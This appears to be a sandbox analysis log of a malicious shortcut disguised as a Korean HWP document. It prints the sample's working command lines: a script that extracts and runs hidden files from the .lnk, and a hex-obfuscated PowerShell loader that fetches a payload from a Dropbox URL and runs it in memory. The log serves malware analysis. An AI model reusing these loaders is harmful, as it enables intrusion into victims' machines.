NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2864
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\Public\032310.bat
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file c:\Users\test22\AppData\Local\Temp\ynlhqo4l.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\북한최고인민회의 결과.hwp.lnk
file c:\Users\test22\AppData\Local\Temp\vl9yckxz.dll
file c:\Users\test22\AppData\Local\Temp\rv5o9q0r.dll
file C:\Users\Public\031023.bat
file c:\Users\test22\AppData\Local\Temp\se0jed8v.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\북한최고인민회의 결과.hwp.lnk
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file C:\Users\test22\AppData\Local\Temp\북한최고인민회의 결과.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline C:\Windows\system32\cmd.exe /K C:\Users\Public\032310.bat
cmdline powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
cmdline "C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\032310.bat&&echo SET b=shell.exe>>C:\Users\Public\032310.bat&&echo SET M=%a%%b%>>C:\Users\Public\032310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\032310.bat&& start /min C:\Users\Public\032310.bat&&exit
domain dl.dropboxusercontent.com
file C:\Users\test22\AppData\Local\Temp\rv5o9q0r.dll
file C:\Users\test22\AppData\Local\Temp\vl9yckxz.dll
file C:\Users\test22\AppData\Local\Temp\se0jed8v.dll
file C:\Users\test22\AppData\Local\Temp\ynlhqo4l.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2868
thread_handle: 0x00000088
process_identifier: 2864
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x032B004C} | Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x0000130A, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00011400;$lnkFile.Read($pdfFile, 0, 0x00011400);$PdfPath = $lnkPath.Replace('.lnk','.hwp');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0001270A,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'031023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 3048
thread_handle: 0x00000088
process_identifier: 3044
current_directory:
filepath: c:\Windows\SysWOW64\cmd.exe
track: 1
command_line: c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
filepath_r: c:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 1336
thread_handle: 0x00000094
process_identifier: 1356
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
filepath_r: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data sent |xe;‡WÆ;A7Èpìé¢zŠ™<ºh‹c—€Pcô˕[/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;‡;ÆXüj!_ sU@¯˜oPSyrÇájÆvjÀ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;’_–Çœe"ÔÍÞtƒ‚=˜rLNÞ~Þ9t⦀5/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;’Òv„Ø×@¡w¿/"6B-Œº¯Ãòq °„Ò/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;Wœhñðªý1«ÔÌö¢‚)aû=Ü°hUHrd²/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;áŒTÕµO€ ¹j[üΛ¿Á‘·´ýK‡ŒÚY1/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;¨Ln4±Ô,[”ƒ ”<e^Ix{nÔB>-Ò¾ƒá/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;¨ÀGÉ tŒ¼Í68¨ݞó4°°›oqp@i/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;³´ù‹¢u®–³&FÂù…9·ÌŒÖ}[Xòö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;³ViŽ3Š‡†fÈQðô iyÕOeT 1-‚/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;¾f5N^| ½gÕ¿B¦Æ¡¬Ê­ÛÔnksÑ[WN/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;¾/ˆm ʤŠ0yToÿÞÁ4FZސ±Q¢$ /5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ÉÒäÂ4ís¾Ç“ 1O¦ÂÔx؊$,/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ÉÍlËs3 xÍ.›üqñ´4»ö™À7Ùkù¬”/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ÔâÑÚ%¬_@±¢G”ÿ¨Ú±ëouS˜š‡qªj/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;Ô»ëú¹ÒK’¤ÿ°M²i➆àËU†¼§ò(P/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ßŸŸfŽ;ƒÂ'Iþ¸X£—Dr©q]8Ÿ…sA)ù/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ßš¡ì>¬Í€—áÍxûÕO8£M?¢ ³£=•j½É/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;ê§œZ¤ð T“‘Ë÷ \+Ê 6á|iˆs Þ]/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;êÞ·ç”È ©¾-˜Ý[%È·ïãŽN— E‡Å^/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;õ_o÷íÚ·%"í 4CƒKÆmˆÎéœ#<þF¨Î•/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Data sent |xe;õÂhSì–3âç^Ýoª =¡Á Ší›µŽpBOÙ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com  
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ynlhqo4l.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\vl9yckxz.cmdline"
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$gattecaqq ="$radetaa="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F3376647A36747739347836783178646266366F61702F32303233313030322E7A69703F726C6B65793D39713670663431736F78306B6377346C3377336C623268767526646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$harsan="""""";for($i=0;$i -le $radetaa.Length-2;$i=$i+2){$MMOMM=$radetaa[$i]+$radetaa[$i+1];$harsan= $harsan+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($harsan));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($gattecaqq));while(true){}"
cmdline C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\se0jed8v.cmdline"
